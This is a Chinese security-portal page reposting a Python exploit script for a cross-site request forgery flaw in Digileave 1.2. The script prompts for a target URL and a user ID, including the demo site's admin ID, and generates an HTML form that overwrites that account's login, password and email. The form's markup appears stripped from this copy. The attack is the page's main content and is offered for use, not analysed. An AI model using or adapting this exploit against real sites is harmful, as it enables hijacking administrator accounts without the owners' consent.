首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Digileave 1.2 - Cross-Site Request Forgery (Update Admin)
来源:http://ihsan.net 作者:Sencan 发布时间:2017-09-19  
#!/usr/local/bin/python # # # # # # Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin) # Dork: N/A # Date: 18.09.2017 # Vendor Homepage: http://www.digiappz.com/ # Software Link: http://www.digiappz.com/digileave.asp?id=1 # Demo: http://www.digiappz.com/digileave/login.asp # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # import os import urllib if os.name == 'nt': os.system('cls') else: os.system('clear') def csrfexploit(): e_baslik = ''' ################################################################################ ______ _______ ___ _ __ _____ _______ ___________ _ __ / _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / / / // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ / _/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| / /___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/ WWW.IHSAN.NET ihsan[@]ihsan.net + Digileave 1.2 - CSRF (Update Admin) ################################################################################ ''' print e_baslik url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digileave: ")) id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8511): ") csrfhtmlcode = '''
User Update
Choose Login*
Choose Password*
First Name*
Last Name*
Email*
''' %(url, id) print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created." print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n") extension = ".html" name = raw_input(" Filename: ") filename = name+extension file = open(filename, "w") file.write(csrfhtmlcode) file.close() print(" [+] Your exploit is saved as %s")%filename print("") csrfexploit()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Digirez 3.4 - Cross-Site Reque
·DigiAffiliate 1.4 - Cross-Site
·Netdecision 5.8.2 - Local Priv
·Microsoft Windows Kernel - 'wi
·D-Link DIR8xx Routers - Local
·Microsoft Windows Kernel - 'wi
·D-Link DIR8xx Routers - Root R
·Microsoft Windows Kernel - 'nt
·D-Link DIR8xx Routers - Leak C
·Microsoft Windows Kernel - 'wi
·Astaro Security Gateway 7 - Re
·Microsoft Windows Kernel - 'wi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved